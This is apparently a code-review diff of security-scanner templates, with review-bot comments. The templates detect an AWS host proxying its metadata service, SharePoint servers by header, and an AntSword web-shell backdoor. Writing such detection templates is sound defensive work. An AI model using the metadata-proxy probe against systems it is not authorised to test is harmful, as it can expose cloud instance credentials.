--- a/misconfiguration/proxy/metadata-aws.yaml
+++ b/misconfiguration/proxy/metadata-aws.yaml
@@ -12,7 +12,7 @@ info:
name: Amazon AWS Metadata Service Check
author: sullo
severity: critical
- description: The AWS host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure. Upgrade to IMDSv2.
+ description: The AWS host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure.
reference:
- https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
- https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/
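Review bot: The rewritten `description:` drops the "Upgrade to IMDSv2." guidance without moving it into a `remediation:` key, even though this commit introduces `remediation:` in CVE-2021-38540 and aem-crx-bypass for exactly this kind of advice; the fix guidance is therefore lost from the template. Add `remediation: Require IMDSv2 (session-token based access) on the instance so the metadata service cannot be reached through a proxied GET request.` under `classification:` or after `reference:`.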
@@ -41,4 +41,5 @@ requests:
- "public-ipv4"
- "privateIp"
condition: or
-# Enhanced by cs on 2022/02/14
+
+# Enhanced by mp on 2022/04/22
diff --git a/technologies/microsoft/microsoft-sharepoint-detect.yaml b/technologies/microsoft/microsoft-sharepoint-detect.yaml
new file mode 100644
index 0000000000..7b5b50446f
--- /dev/null
+++ b/technologies/microsoft/microsoft-sharepoint-detect.yaml
@@ -0,0 +1,24 @@
+id: microsoft-sharepoint-detect
+
+info:
+ name: Microsoft SharePoint Detect
+ author: p-l-
+ severity: info
+ description: Check for SharePoint, using HTTP header MicrosoftSharePointTeamServices
+ tags: sharepoint,iis,microsoft,tech
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - "(?i)(Microsoftsharepointteamservices:)"
+
+ extractors:
+ - type: kval
+ kval:
+ - MicrosoftSharePointTeamServices
diff --git a/vulnerabilities/other/antsword-backdoor.yaml b/vulnerabilities/other/antsword-backdoor.yaml
index 981dc2652b..27ea2ed01c 100644
--- a/vulnerabilities/other/antsword-backdoor.yaml
+++ b/vulnerabilities/other/antsword-backdoor.yaml
@@ -1,17 +1,17 @@
id: antsword-backdoor
info:
- name: Antsword Backdoor Identified
+ name: AntSword Backdoor Detection
author: ffffffff0x
severity: critical
- description: The Antsword application contains a backdoor shell.
+ description: An AntSword application backdoor shell was discovered.
reference:
- https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-553
- remediation: Reinstall Anstsword on a new system due to the target system's compromise. Follow best practices for securing PHP servers/applications via the php.ini and other mechanisms.
+ remediation: Reinstall AnstSword on a new system due to the target system's compromise. Follow best practices for securing PHP servers/applications via the php.ini and other mechanisms.
tags: backdoor,antsword
requests:
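Review bot: The new `remediation:` line still misspells the product as "AnstSword" while the `name:` and `description:` lines in the same hunk are corrected to "AntSword". Suggest `remediation: Reinstall AntSword on a new system due to the target system's compromise. Follow best practices for securing PHP servers/applications via the php.ini and other mechanisms.`.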
@@ -33,4 +33,4 @@ requests:
status:
- 200
-# Enhanced by cs 2022/03/31
+# Enhanced by mp on 2022/04/22